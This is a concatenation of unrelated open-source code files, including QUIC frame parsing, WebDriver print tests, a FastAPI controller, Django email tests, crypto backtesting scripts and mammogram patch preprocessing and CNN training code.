param_buf = Buffer(capacity=65536)
if param_type == int:
param_buf.push_uint_var(param_value)
elif param_type == bytes:
param_buf.push_bytes(param_value)
elif param_type == QuicPreferredAddress:
push_quic_preferred_address(param_buf, param_value)
buf.push_uint_var(param_id)
buf.push_uint_var(param_buf.tell())
buf.push_bytes(param_buf.data)
# FRAMES
class QuicFrameType(IntEnum):
PADDING = 0x00
PING = 0x01
ACK = 0x02
ACK_ECN = 0x03
RESET_STREAM = 0x04
STOP_SENDING = 0x05
CRYPTO = 0x06
NEW_TOKEN = 0x07
STREAM_BASE = 0x08
MAX_DATA = 0x10
MAX_STREAM_DATA = 0x11
MAX_STREAMS_BIDI = 0x12
MAX_STREAMS_UNI = 0x13
DATA_BLOCKED = 0x14
STREAM_DATA_BLOCKED = 0x15
STREAMS_BLOCKED_BIDI = 0x16
STREAMS_BLOCKED_UNI = 0x17
NEW_CONNECTION_ID = 0x18
RETIRE_CONNECTION_ID = 0x19
PATH_CHALLENGE = 0x1A
PATH_RESPONSE = 0x1B
TRANSPORT_CLOSE = 0x1C
APPLICATION_CLOSE = 0x1D
HANDSHAKE_DONE = 0x1E
DATAGRAM = 0x30
DATAGRAM_WITH_LENGTH = 0x31
NON_ACK_ELICITING_FRAME_TYPES = frozenset(
[
QuicFrameType.ACK,
QuicFrameType.ACK_ECN,
QuicFrameType.PADDING,
QuicFrameType.TRANSPORT_CLOSE,
QuicFrameType.APPLICATION_CLOSE,
]
)
NON_IN_FLIGHT_FRAME_TYPES = frozenset(
[
QuicFrameType.ACK,
QuicFrameType.ACK_ECN,
QuicFrameType.TRANSPORT_CLOSE,
QuicFrameType.APPLICATION_CLOSE,
]
)
PROBING_FRAME_TYPES = frozenset(
[
QuicFrameType.PATH_CHALLENGE,
QuicFrameType.PATH_RESPONSE,
QuicFrameType.PADDING,
QuicFrameType.NEW_CONNECTION_ID,
]
)
@dataclass
class QuicStreamFrame:
data: bytes = b""
fin: bool = False
offset: int = 0
def pull_ack_frame(buf: Buffer) -> Tuple[RangeSet, int]:
rangeset = RangeSet()
end = buf.pull_uint_var() # largest acknowledged
delay = buf.pull_uint_var()
ack_range_count = buf.pull_uint_var()
ack_count = buf.pull_uint_var() # first ack range
rangeset.add(end - ack_count, end + 1)
end -= ack_count
for _ in range(ack_range_count):
end -= buf.pull_uint_var() + 2
ack_count = buf.pull_uint_var()
rangeset.add(end - ack_count, end + 1)
end -= ack_count
return rangeset, delay
def push_ack_frame(buf: Buffer, rangeset: RangeSet, delay: int) -> int:
ranges = len(rangeset)
index = ranges - 1
r = rangeset[index]
buf.push_uint_var(r.stop - 1)
buf.push_uint_var(delay)
buf.push_uint_var(index)
buf.push_uint_var(r.stop - 1 - r.start)
start = r.start
while index > 0:
index -= 1
r = rangeset[index]
buf.push_uint_var(start - r.stop - 1)
buf.push_uint_var(r.stop - r.start - 1)
start = r.start
return ranges
```
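As a quick sanity check of `decode_packet_number`, the sample values from RFC 9000 Appendix A.3 can be plugged in, assuming (as in aioquic's own usage) that `expected` is the largest received packet number plus one and that aioquic is importable as a package.

```python
# Values from RFC 9000 Appendix A.3; decoding should recover 0xa82f9b32.
from aioquic.quic.packet import decode_packet_number

largest_received = 0xa82f30ea
truncated = 0x9b32                     # 16-bit truncated packet number off the wire
decoded = decode_packet_number(truncated, 16, expected=largest_received + 1)
assert decoded == 0xa82f9b32
```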
#### File: wave/data/session.py
```python
from __future__ import absolute_import
from __future__ import unicode_literals
from ..testing.test_loader import MANUAL, AUTOMATIC
PAUSED = "paused"
RUNNING = "running"
COMPLETED = "completed"
ABORTED = "aborted"
PENDING = "pending"
UNKNOWN = "unknown"
class Session(object):
def __init__(
self,
token=None,
types=None,
user_agent=None,
labels=None,
tests=None,
pending_tests=None,
running_tests=None,
timeouts=None,
status=None,
test_state=None,
last_completed_test=None,
recent_completed_count=None,
date_started=None,
date_finished=None,
is_public=None,
reference_tokens=None,
browser=None,
webhook_urls=None,
expiration_date=None,
malfunctioning_tests=None
):
if token is None:
token = ""
self.token = token
if types is None:
types = [AUTOMATIC, MANUAL]
self.types = types
if user_agent is None:
user_agent = ""
self.user_agent = user_agent
if labels is None:
labels = []
self.labels = labels
if tests is None:
tests = {}
self.tests = tests
if pending_tests is None:
pending_tests = {}
self.pending_tests = pending_tests
if running_tests is None:
running_tests = {}
self.running_tests = running_tests
if timeouts is None:
timeouts = {}
self.timeouts = timeouts
if status is None:
status = UNKNOWN
self.status = status
if test_state is None:
test_state = {}
self.test_state = test_state
self.last_completed_test = last_completed_test
if recent_completed_count is None:
recent_completed_count = 0
self.recent_completed_count = recent_completed_count
self.date_started = date_started
self.date_finished = date_finished
if is_public is None:
is_public = False
self.is_public = is_public
if reference_tokens is None:
reference_tokens = []
self.reference_tokens = reference_tokens
self.browser = browser
if webhook_urls is None:
webhook_urls = []
self.webhook_urls = webhook_urls
self.expiration_date = expiration_date
if malfunctioning_tests is None:
malfunctioning_tests = []
self.malfunctioning_tests = malfunctioning_tests
```
#### File: tests/print/printcmd.py
```python
import base64
import pytest
import six
from tests.support.asserts import assert_error, assert_success
def decodebytes(s):
return base64.decodebytes(six.ensure_binary(s))
def do_print(session, options):
return session.transport.send(
"POST", "session/{session_id}/print".format(**vars(session)),
options)
def assert_pdf(data):
assert data.startswith(b"%PDF-"), "Decoded data starts with the PDF signature"
assert data.endswith(b"%%EOF\n"), "Decoded data ends with the EOF flag"
def test_no_top_browsing_context(session, closed_window):
response = do_print(session, {})
assert_error(response, "no such window")
def test_no_browsing_context(session, closed_frame):
response = do_print(session, {})
value = assert_success(response)
pdf = decodebytes(value)
assert_pdf(pdf)
def test_html_document(session, inline):
session.url = inline("Test")
response = do_print(session, {
"page": {"width": 10,
"height": 20},
"shrinkToFit": False
})
value = assert_success(response)
pdf = decodebytes(value)
# TODO: Test that the output is reasonable
assert_pdf(pdf)
@pytest.mark.parametrize("options", [{"orientation": 0},
{"orientation": "foo"},
{"scale": "1"},
{"scale": 3},
{"scale": 0.01},
{"margin": {"top": "1"}},
{"margin": {"bottom": -1}},
{"page": {"height": False}},
{"shrinkToFit": "false"}])
def test_invalid(session, options):
response = do_print(session, options)
assert_error(response, "invalid argument")
```
#### File: websockets/handlers/protocol_wsh.py
```python
from mod_pywebsocket import msgutil, util
def web_socket_do_extra_handshake(request):
    request.ws_protocol = request.headers_in.get('sec-websocket-protocol')
    # pass

def web_socket_transfer_data(request):
    while True:
        msgutil.send_message(request, request.ws_protocol)
        return
``` |
{
"source": "JimmyWuMadchester/CoinMarketCapBacktesting",
"score": 3
} |
#### File: CoinMarketCapBacktesting/TestingStageEnvWin/coinbacktesting_bt.py
```python
import coinrepo
import bt
def main():
    '''entry point'''
    # Get test data with all fields
    symbol_list = ['BTC', 'ETH']
    history = coinrepo.get_coinhistory(symbol_list)
    history = history.set_index('Date')
    # Pivot to have only price as timeseries
    pricehistory = history.pivot(columns='Symbol')['Price']
    # Create the strategy
    s = bt.Strategy('s1', [bt.algos.RunMonthly(),
                           bt.algos.SelectAll(),
                           bt.algos.WeighEqually(),
                           bt.algos.Rebalance()])
    # Create a backtest and run it
    test = bt.Backtest(s, pricehistory)
    res = bt.run(test)
    res.display()
    # Save figures
    plot = pricehistory.plot(figsize=(15, 5))
    fig = plot.get_figure()
    fig.savefig("price.png")
    plot1 = res.plot_weights(figsize=(15, 5))
    fig1 = plot1.get_figure()
    fig1.savefig("bt_rest.png")
    # # Test that the bt framework is installed properly
    # data = bt.get('aapl,msft,c,gs,ge', start='2010-01-01')
    # print(data.head())

if __name__ == "__main__":
    main()
``` |
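The same strategy can be exercised without `coinrepo` by feeding `bt` a synthetic price DataFrame of the shape the pivot above produces (a DatetimeIndex with one column per symbol). A self-contained sketch, assuming `bt`, `pandas`, and `numpy` are installed; the prices are random and purely illustrative.

```python
# Toy version of the same pipeline with synthetic BTC/ETH prices.
import numpy as np
import pandas as pd
import bt

dates = pd.date_range('2018-01-01', periods=180, freq='D')
pricehistory = pd.DataFrame({
    'BTC': 10000 + np.cumsum(np.random.randn(180) * 100),
    'ETH': 800 + np.cumsum(np.random.randn(180) * 10),
}, index=dates)

s = bt.Strategy('s1', [bt.algos.RunMonthly(),
                       bt.algos.SelectAll(),
                       bt.algos.WeighEqually(),
                       bt.algos.Rebalance()])
res = bt.run(bt.Backtest(s, pricehistory))
res.display()
```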
{
"source": "JimmyWuMadchester/CoinPlayGround",
"score": 3
} |
#### File: JimmyWuMadchester/CoinPlayGround/test.py
```python
import helpers
import sqlserver_test
def main():
    '''entry point'''
    df_coinsymbols = sqlserver_test.get_allcoinsymbols()
    for symbol in df_coinsymbols['symbol']:
        print(symbol)
        history_json = helpers.get_full_history(symbol)
        df_history = helpers.get_df_full_history_usd(history_json)
        tuples = [tuple(x) for x in df_history.values]
        for row in tuples:
            sqlserver_test.set_coin_history(row)

if __name__ == "__main__":
    main()
``` |
{
"source": "Jimmy-Xu/fastapi_demo",
"score": 2
} |
#### File: app/controller/org.py
```python
from fastapi import APIRouter, Depends
from fastapi_plus.schema.base import ListArgsSchema, RespListSchema, RespIdSchema, RespBaseSchema
from fastapi_plus.utils.auth import get_auth_data
from fastapi_plus.utils.custom_route import CustomRoute
from ..schema.org import OrgInfoSchema, OrgRespDetailSchema
from ..service.org import OrgService
router = APIRouter(route_class=CustomRoute)
@router.post('/list', response_model=RespListSchema)
async def list(*, args: ListArgsSchema, auth_data: dict = Depends(get_auth_data)):
    """
    Read the organization list
    :param args: request arguments
    :return: organization list schema
    """
    args.user_id = auth_data.get('user_id')
    return OrgService(auth_data).list(args)


@router.get('/{id}', response_model=OrgRespDetailSchema)
async def read(id: int, auth_data: dict = Depends(get_auth_data)):
    """
    Read the details of an organization
    :param id: organization id
    :return: organization detail schema
    """
    resp = OrgRespDetailSchema()
    resp.detail = OrgService(auth_data).read(id)
    return resp


@router.post('', response_model=RespIdSchema, response_model_exclude_none=True)
async def create(*, info: OrgInfoSchema, auth_data: dict = Depends(get_auth_data)):
    """
    Create an organization
    :param info: organization data
    :return:
    """
    return OrgService(auth_data).create(info)


@router.put('/{id}', response_model=RespBaseSchema)
async def update(*, info: OrgInfoSchema, auth_data: dict = Depends(get_auth_data)):
    """
    Update an organization
    :param info: organization data
    :return:
    """
    return OrgService(auth_data).update(info)


@router.delete("/{id}", response_model=RespBaseSchema)
async def delete(id: int, auth_data: dict = Depends(get_auth_data)):
    """
    Delete an organization
    :param id: organization id
    :return:
    """
    return OrgService(auth_data).delete(id)
``` |
{
"source": "jimmyye/django-post_office",
"score": 2
} |
#### File: post_office/tests/test_html_email.py
```python
import os
from email.mime.image import MIMEImage
from django.core.mail import EmailMultiAlternatives
from django.core.mail.message import SafeMIMEMultipart, SafeMIMEText
from django.core.files.images import ImageFile
from django.template.loader import get_template
from django.test import TestCase
from django.test.utils import override_settings
from post_office.models import Email, EmailTemplate, STATUS
from post_office.template import render_to_string
from post_office.template.backends.post_office import PostOfficeTemplates
from post_office.mail import send, send_queued
class HTMLMailTest(TestCase):
def test_text(self):
template = get_template('hello.html', using='post_office')
self.assertIsInstance(template.backend, PostOfficeTemplates)
context = {'foo': "Bar"}
content = template.render(context)
self.assertHTMLEqual(content, '<h1>Bar</h1>')
def test_html(self):
template = get_template('image.html', using='post_office')
body = template.render({'imgsrc': 'dummy.png'})
self.assertHTMLEqual(body, """
<h3>Testing image attachments</h3>
<img src="cid:f5c66340b8af7dc946cd25d84fdf8c90" width="200" />
""")
subject = "[Django Post-Office unit tests] attached image"
msg = EmailMultiAlternatives(subject, body, to=['<EMAIL>'])
template.attach_related(msg)
msg.content_subtype = 'html'
self.assertEqual(msg.mixed_subtype, 'related')
# this message can be sent by email
parts = msg.message().walk()
part = next(parts)
self.assertIsInstance(part, SafeMIMEMultipart)
part = next(parts)
self.assertIsInstance(part, SafeMIMEText)
self.assertHTMLEqual(part.get_payload(), body)
part = next(parts)
self.assertIsInstance(part, MIMEImage)
self.assertEqual(part.get_content_type(), 'image/png')
self.assertEqual(part['Content-Disposition'], 'inline; filename="f5c66340b8af7dc946cd25d84fdf8c90"')
self.assertEqual(part.get_content_disposition(), 'inline')
self.assertEqual(part.get_filename(), 'f5c66340b8af7dc946cd25d84fdf8c90')
self.assertEqual(part['Content-ID'], '<f5c66340b8af7dc946cd25d84fdf8c90>')
def test_mixed(self):
body = "Testing mixed text and html attachments"
html, attached_images = render_to_string('image.html', {'imgsrc': 'dummy.png'}, using='post_office')
subject = "[django-SHOP unit tests] attached image"
msg = EmailMultiAlternatives(subject, body, to=['<EMAIL>'])
msg.attach_alternative(html, 'text/html')
for attachment in attached_images:
msg.attach(attachment)
msg.mixed_subtype = 'related'
# this message can be sent by email
parts = msg.message().walk()
part = next(parts)
self.assertIsInstance(part, SafeMIMEMultipart)
part = next(parts)
self.assertIsInstance(part, SafeMIMEMultipart)
part = next(parts)
self.assertIsInstance(part, SafeMIMEText)
self.assertEqual(part.get_content_type(), 'text/plain')
self.assertHTMLEqual(part.get_payload(), body)
part = next(parts)
self.assertIsInstance(part, SafeMIMEText)
self.assertEqual(part.get_content_type(), 'text/html')
self.assertHTMLEqual(part.get_payload(), html)
part = next(parts)
self.assertIsInstance(part, MIMEImage)
self.assertEqual(part.get_content_type(), 'image/png')
def test_image(self):
relfilename = 'static/dummy.png'
filename = os.path.join(os.path.dirname(__file__), relfilename)
imagefile = ImageFile(open(filename, 'rb'), name=relfilename)
template = get_template('image.html', using='post_office')
body = template.render({'imgsrc': imagefile})
self.assertHTMLEqual(body, """
<h3>Testing image attachments</h3>
<img src="cid:f5c66340b8af7dc946cd25d84fdf8c90" width="200" />
""")
subject = "[Django Post-Office unit tests] attached image"
msg = EmailMultiAlternatives(subject, body, to=['<EMAIL>'])
template.attach_related(msg)
# this message can be sent by email
parts = msg.message().walk()
part = next(parts)
self.assertIsInstance(part, SafeMIMEMultipart)
part = next(parts)
self.assertIsInstance(part, SafeMIMEText)
self.assertEqual(part.get_payload(), body)
part = next(parts)
self.assertIsInstance(part, MIMEImage)
self.assertEqual(part.get_content_type(), 'image/png')
self.assertEqual(part['Content-Disposition'], 'inline; filename="f5c66340b8af7dc946cd25d84fdf8c90"')
self.assertEqual(part.get_content_disposition(), 'inline')
self.assertEqual(part.get_filename(), 'f5c66340b8af7dc946cd25d84fdf8c90')
self.assertEqual(part['Content-ID'], '<f5c66340b8af7dc946cd25d84fdf8c90>')
@override_settings(EMAIL_BACKEND='django.core.mail.backends.locmem.EmailBackend', POST_OFFICE={
'BACKENDS': {'locmem': 'django.core.mail.backends.locmem.EmailBackend'},
'TEMPLATE_ENGINE': 'post_office',
})
def test_send_with_html_template(self):
template = EmailTemplate.objects.create(
name="Test Inlined Images",
subject="[django-SHOP unit tests] attached image",
html_content="""
{% load post_office %}
<h3>Testing image attachments</h3>
<img src="{% inline_image imgsrc %}" width="200" />"""
)
filename = os.path.join(os.path.dirname(__file__), 'static/dummy.png')
context = {'imgsrc': filename}
queued_mail = send(recipients=['<EMAIL>'], sender='<EMAIL>',
template=template, context=context, render_on_delivery=True)
queued_mail = Email.objects.get(id=queued_mail.id)
send_queued()
self.assertEqual(Email.objects.get(id=queued_mail.id).status, STATUS.sent)
``` |
{
"source": "jimmyyhwu/ddsm-visual-primitives",
"score": 3
} |
#### File: data/preprocessing/preprocess_ddsm_patch_images.py
```python
import numpy as np
import pandas as pd
import sys
import os
import random
import glob
import fnmatch
import dicom
import scipy.misc
from joblib import Parallel, delayed
import multiprocessing
# Resizes img to the size given by the tuple resize, preserving the aspect
# ratio of the input image and padding the remaining pixels with black
# background.
def resize_image(img, resize, interp_method='bicubic'):
    # Check which dimension of the input img needs larger scaling down and
    # define the size of the output image accordingly
    if float(img.shape[0])/resize[0] > float(img.shape[1])/resize[1]:
        new_h = resize[0]
        new_w = int(np.floor(float(resize[0])*img.shape[1]/img.shape[0]))
    else:
        new_w = resize[1]
        new_h = int(np.floor(float(resize[1])*img.shape[0]/img.shape[1]))
    # Create a numpy array with size equal to resize and full of black background
    new_img = np.zeros(resize)
    # Set the upper corner of the image equal to the resized image
    if len(img.shape) == 2:
        new_img[0:new_h, 0:new_w] = scipy.misc.imresize(img, (new_h, new_w), interp_method)
    else:
        new_img[0:new_h, 0:new_w] = scipy.misc.imresize(img, (new_h, new_w), interp_method)[0:new_h, 0:new_w, 0]
    return new_img
def read_in_one_image(im_name, resize, interp_method='bicubic', normalize=True):
    try:
        type = im_name.split('.')[-1].lower()
        # Check if it is a dicom image
        if type == 'dcm':
            dicom_content = dicom.read_file(im_name)
            img = dicom_content.pixel_array
        # Otherwise if it is jpg just read
        else:
            img = scipy.misc.imread(im_name)
        img = resize_image(img, resize, interp_method)
        # Normalize image
        img = img.astype(np.float32)
        if normalize:
            img -= np.mean(img)
            img /= np.std(img)
        # Check that img is in shape (n, m, 3)
        if len(img.shape) == 2:
            img = np.repeat(img[:, :, np.newaxis], 3, axis=2)
        img[0, 0, 0] = 0
        img[0, 0, 1] = 1
        img[0, 0, 2] = 2
        return img
    except IOError as e:
        print('Could not open image file for {}'.format(im_name))
        return []

# Transforms the input name into an output name for where to save the processed
# image
def get_output_name(im_name, output_dir, output_img_type):
    basename = os.path.basename(im_name)
    pre, ext = os.path.splitext(basename)
    png_name = pre + '.' + output_img_type
    return os.path.join(output_dir, png_name)
if __name__ == '__main__':
    # Folder containing input patch images (images should not be organized into
    # subdirectories)
    input_dir = sys.argv[1]
    # Folder for target png images
    output_dir = sys.argv[2]
    # Type of input images
    input_img_type = sys.argv[3]
    # Type of output images
    output_img_type = sys.argv[4]
    # Size to which each image should be resized
    height = int(sys.argv[5])
    width = int(sys.argv[6])
    # Interpolation method?
    interp = sys.argv[7] or 'bilinear'
    # Normalize image (z-score)?
    norm = sys.argv[8] or False

    def read_and_save(im_name):
        out_name = get_output_name(im_name, output_dir, output_img_type)
        scipy.misc.imsave(out_name, read_in_one_image(im_name, (height, width)))
        print("Saved {}".format(out_name))

    num_cores = multiprocessing.cpu_count()
    inputs = Parallel(n_jobs=num_cores)(
        delayed(read_and_save)(im) for im in
        glob.iglob(os.path.join(input_dir, "*.{}".format(input_img_type))))
```
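For clarity on the positional-argument order the script expects, here is a hypothetical invocation; all paths and sizes are placeholders.

```python
# Hypothetical invocation; argument order follows the sys.argv parsing above.
import subprocess

subprocess.run([
    "python", "preprocess_ddsm_patch_images.py",
    "/data/ddsm/patches/raw/in",   # input_dir
    "/data/ddsm/patches/raw/out",  # output_dir
    "jpg",                         # input image type
    "png",                         # output image type
    "227", "227",                  # height, width
    "bilinear",                    # interpolation method
    "",                            # normalize flag (empty string -> default False)
])
```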
#### File: data/preprocessing/save_ddsm_patch_datasets.py
```python
import os, sys
import mammogram
import dataloader
from joblib import Parallel, delayed
import multiprocessing
# Should parallelism be used in executing this script?
use_parallelism = True
# Folder with DDSM jpg files organized into subfolders by type
# (e.g., cancers, normals, benigns, ...)
ddsm_jpg_dir = os.path.join('/data','ddsm','raw')
# Folder with DDSM overlay files organized into subfolders by type
# (e.g., cancers, normals, benigns, ...)
ddsm_overlay_dir = os.path.join('/data','ddsm','overlays')
# Folder to which patch datasets will be saved
ddsm_patch_dir = os.path.join('/data','ddsm','patches','raw')
# Should patch images be saved?
save_images = True
# Which extension should be used for saved images
extension = 'jpg'
# Which labels should be generated? (See mammogram.get_patch_label())
label_names = ['breast_pct',
'patch_pct-any','patch_pct-mass','patch_pct-calc',
'lesion_pct-any','lesion_pct-mass','lesion_pct-calc',
'patch_pct-any-malignant','patch_pct-mass-malignant',
'patch_pct-calc-malignant',
'lesion_pct-any-malignant','lesion_pct-mass-malignant',
'lesion_pct-calc-malignant',
'patch_pct-any-3','patch_pct-mass-3','patch_pct-calc-3',
'lesion_pct-any-3','lesion_pct-mass-3','lesion_pct-calc-3',
'patch_pct-any-4','patch_pct-mass-4','patch_pct-calc-4',
'lesion_pct-any-4','lesion_pct-mass-4','lesion_pct-calc-4',
'patch_pct-any-5','patch_pct-mass-5','patch_pct-calc-5',
'lesion_pct-any-5','lesion_pct-mass-5','lesion_pct-calc-5']
# Specify patch dataset settings as a series of parallel arrays.
# The i-th entry of each array corresponds to the i-th dataset generated.
# Tile width and height as fraction of image width and height
img_fracs = [0.5, 0.25, 0.125]
# What fraction of minimum patch dimension used as stride
stride_fracs = [0.5, 0.5, 0.5]
# Load DDSM exams from specified folders
types = ['cancers','benigns','benign_without_callbacks','normals']
exams = dataloader.ddsm_load_data(ddsm_jpg_dir,ddsm_overlay_dir,types=types)
# Generate patch images and labels associated with each scan
# in each exam
def save_exam_patches(exam):
    for scan in exam.scans:
        scan.save_patch_datasets(ddsm_patch_dir, img_fracs, stride_fracs,
                                 label_names, save_images,
                                 extension)
num_cores = multiprocessing.cpu_count() if use_parallelism else 1
Parallel(n_jobs = num_cores)(delayed(save_exam_patches)(exam) for exam in exams)
```
#### File: ddsm-visual-primitives/server/cache_patch_labels.py
```python
import argparse
import os
import pickle
def process_line(line):
    image_name, label = line.strip().split(' ')
    label = int(label)
    return image_name, label
parser = argparse.ArgumentParser()
parser.add_argument('--labels_path', default='../data/ddsm_2class/val.txt')
parser.add_argument('--output_dir', default='data/labels/')
parser.add_argument('--output_file', default='val.pickle')
args = parser.parse_args()
with open(args.labels_path, 'r') as f:
    image_list = map(process_line, f.readlines())

cache = {}
for image_path, label in image_list:
    _, image_name = os.path.split(image_path)
    cache[image_name] = label

if not os.path.exists(args.output_dir):
    os.makedirs(args.output_dir)

with open(os.path.join(args.output_dir, args.output_file), 'wb') as f:
    pickle.dump(cache, f)
```
#### File: ddsm-visual-primitives/training/train_2class.py
```python
import argparse
import os
import time
from datetime import datetime
import torch
import torch.backends.cudnn as cudnn
import torch.nn as nn
import torchnet
import torchvision.models as models
import torchvision.transforms as transforms
import yaml
from munch import Munch
from tensorboardX import SummaryWriter
from torch.autograd import Variable
import datasets
# pytorch 1.0 and torchvision 0.1.9
import torchvision
assert '0.1.9' in torchvision.__file__
# https://discuss.pytorch.org/t/inception3-runtimeerror-the-expanded-size-of-the-tensor-3-must-match-the-existing-size-864-at-non-singleton-dimension-3/32090
from inception import inception_v3
models.__dict__['inception_v3'] = inception_v3
def accuracy(output, target):
pred = output.max(1)[1]
return 100.0 * target.eq(pred).float().mean()
def save_checkpoint(checkpoint_dir, state, epoch):
file_path = os.path.join(checkpoint_dir, 'checkpoint_{:08d}.pth.tar'.format(epoch))
torch.save(state, file_path)
return file_path
def adjust_learning_rate(optimizer, epoch):
lr = cfg.optimizer.lr
for e in cfg.optimizer.lr_decay_epochs:
if epoch >= e:
lr *= 0.1
for param_group in optimizer.param_groups:
param_group['lr'] = lr
return lr
class AverageMeter(object):
"""Computes and stores the average and current value"""
def __init__(self):
self.reset()
def reset(self):
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def update(self, val, n=1):
self.val = val
self.sum += val * n
self.count += n
self.avg = self.sum / self.count
def train(train_loader, model, criterion, optimizer, epoch):
batch_time = AverageMeter()
data_time = AverageMeter()
losses = AverageMeter()
accuracies = AverageMeter()
auc = torchnet.meter.AUCMeter()
model.train()
end = time.time()
for i, (input, target) in enumerate(train_loader):
data_time.update(time.time() - end)
target = target.cuda(non_blocking=True)
output = model(input)
loss = criterion(output, target)
acc = accuracy(output, target)
losses.update(loss.item(), input.size(0))
accuracies.update(acc, input.size(0))
prob = nn.Softmax(dim=1)(output.detach())[:, 1].cpu().numpy()
auc.add(prob, target)
optimizer.zero_grad()
loss.backward()
optimizer.step()
batch_time.update(time.time() - end)
end = time.time()
if i % cfg.training.print_freq == 0:
print('Epoch: [{0}][{1}/{2}]\t'
'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
'Data {data_time.val:.3f} ({data_time.avg:.3f})\t'
'Loss {loss.val:.4f} ({loss.avg:.4f})\t'
'Accuracy {accuracy.val:.4f} ({accuracy.avg:.4f})'.format(
epoch, i, len(train_loader), batch_time=batch_time,
data_time=data_time, loss=losses, accuracy=accuracies))
return batch_time.avg, data_time.avg, losses.avg, accuracies.avg, auc.value()[0]
def validate(val_loader, model, criterion):
batch_time = AverageMeter()
losses = AverageMeter()
accuracies = AverageMeter()
auc = torchnet.meter.AUCMeter()
model.eval()
end = time.time()
with torch.no_grad():
for i, (input, target) in enumerate(val_loader):
target = target.cuda(non_blocking=True)
output = model(input)
loss = criterion(output, target)
acc = accuracy(output, target)
losses.update(loss.item(), input.size(0))
accuracies.update(acc, input.size(0))
prob = nn.Softmax(dim=1)(output)[:, 1].cpu().numpy()
auc.add(prob, target)
batch_time.update(time.time() - end)
end = time.time()
if i % cfg.training.print_freq == 0:
print('Test: [{0}/{1}]\t'
'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
'Loss {loss.val:.4f} ({loss.avg:.4f})\t'
'Accuracy {accuracy.val:.4f} ({accuracy.avg:.4f})'.format(
i, len(val_loader), batch_time=batch_time, loss=losses, accuracy=accuracies))
return batch_time.avg, losses.avg, accuracies.avg, auc.value()[0]
def main(cfg):
if cfg.training.resume is not None:
log_dir = cfg.training.log_dir
checkpoint_dir = os.path.dirname(cfg.training.resume)
else:
timestamp = datetime.now().strftime('%Y-%m-%d_%H-%M-%S.%f')
log_dir = os.path.join(cfg.training.logs_dir, '{}_{}'.format(timestamp, cfg.training.experiment_name))
checkpoint_dir = os.path.join(cfg.training.checkpoints_dir, '{}_{}'.format(timestamp, cfg.training.experiment_name))
if not os.path.exists(checkpoint_dir):
os.makedirs(checkpoint_dir)
print('log_dir: {}'.format(log_dir))
print('checkpoint_dir: {}'.format(checkpoint_dir))
model_names = sorted(name for name in models.__dict__
if name.islower() and not name.startswith("__")
and callable(models.__dict__[name]))
print("=> creating model '{}'".format(cfg.arch.model))
model = models.__dict__[cfg.arch.model](pretrained=cfg.arch.pretrained)
if cfg.arch.model.startswith('alexnet') or cfg.arch.model.startswith('vgg'):
model.classifier._modules['6'] = nn.Linear(4096, cfg.arch.num_classes)
elif cfg.arch.model == 'inception_v3':
model.aux_logits = False
model.fc = nn.Linear(2048, cfg.arch.num_classes)
elif cfg.arch.model == 'resnet152':
model.fc = nn.Linear(2048, cfg.arch.num_classes)
else:
        raise Exception('unsupported model: {}'.format(cfg.arch.model))
if cfg.arch.model.startswith('alexnet') or cfg.arch.model.startswith('vgg'):
model.features = torch.nn.DataParallel(model.features)
model.cuda()
else:
model = torch.nn.DataParallel(model).cuda()
cudnn.benchmark = True
criterion = nn.CrossEntropyLoss().cuda()
optimizer = torch.optim.SGD(model.parameters(),
lr=cfg.optimizer.lr,
momentum=cfg.optimizer.momentum,
weight_decay=cfg.optimizer.weight_decay)
start_epoch = 0
if cfg.training.resume is not None:
if os.path.isfile(cfg.training.resume):
print("=> loading checkpoint '{}'".format(cfg.training.resume))
checkpoint = torch.load(cfg.training.resume)
start_epoch = checkpoint['epoch']
model.load_state_dict(checkpoint['state_dict'])
optimizer.load_state_dict(checkpoint['optimizer'])
print("=> loaded checkpoint '{}' (epoch {})".format(cfg.training.resume, checkpoint['epoch']))
else:
print("=> no checkpoint found at '{}'".format(cfg.training.resume))
print('')
            raise Exception("no checkpoint found at '{}'".format(cfg.training.resume))
normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])
train_transforms = []
val_transforms = []
if cfg.arch.model == 'inception_v3':
        train_transforms.append(transforms.Scale(299))  # transforms.Scale is the legacy name for transforms.Resize
val_transforms.append(transforms.Scale(299))
train_dataset = datasets.DDSM(cfg.data.root, 'train', transforms.Compose(train_transforms + [
transforms.ToTensor(),
normalize,
]))
val_dataset = datasets.DDSM(cfg.data.root, 'val', transforms.Compose(val_transforms + [
transforms.ToTensor(),
normalize,
]))
train_loader = torch.utils.data.DataLoader(
train_dataset, batch_size=cfg.data.batch_size, shuffle=True,
num_workers=cfg.data.workers, pin_memory=True)
val_loader = torch.utils.data.DataLoader(
val_dataset, batch_size=cfg.data.batch_size, shuffle=False,
num_workers=cfg.data.workers, pin_memory=True)
train_summary_writer = SummaryWriter(log_dir=os.path.join(log_dir, 'train'))
val_summary_writer = SummaryWriter(log_dir=os.path.join(log_dir, 'val'))
for epoch in range(start_epoch, cfg.training.epochs):
lr = adjust_learning_rate(optimizer, epoch)
train_summary_writer.add_scalar('learning_rate', lr, epoch + 1)
train_batch_time, train_data_time, train_loss, train_accuracy, train_auc = train(
train_loader, model, criterion, optimizer, epoch)
train_summary_writer.add_scalar('batch_time', train_batch_time, epoch + 1)
train_summary_writer.add_scalar('loss', train_loss, epoch + 1)
train_summary_writer.add_scalar('accuracy', train_accuracy, epoch + 1)
train_summary_writer.add_scalar('auc', train_auc, epoch + 1)
val_batch_time, val_loss, val_accuracy, val_auc = validate(
val_loader, model, criterion)
val_summary_writer.add_scalar('batch_time', val_batch_time, epoch + 1)
val_summary_writer.add_scalar('loss', val_loss, epoch + 1)
val_summary_writer.add_scalar('accuracy', val_accuracy, epoch + 1)
val_summary_writer.add_scalar('auc', val_auc, epoch + 1)
if (epoch + 1) % cfg.training.checkpoint_epochs == 0:
checkpoint_path = save_checkpoint(checkpoint_dir, {
'epoch': epoch + 1,
'state_dict': model.state_dict(),
'optimizer' : optimizer.state_dict(),
}, epoch + 1)
cfg.training.log_dir = log_dir
cfg.training.resume = checkpoint_path
with open(os.path.join(log_dir, 'config.yml'), 'w') as f:
f.write(cfg.toYAML())
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('config_path', metavar='PATH', help='path to config file')
args = parser.parse_args()
config_path = args.config_path
with open(config_path, 'r') as f:
cfg = Munch.fromYAML(f)
main(cfg)
``` |
{
"source": "jimmyyhwu/spatial-action-maps",
"score": 2
} |
#### File: spatial-action-maps/aruco/utils.py
```python
from pathlib import Path
import cv2
import usb.core
import usb.util
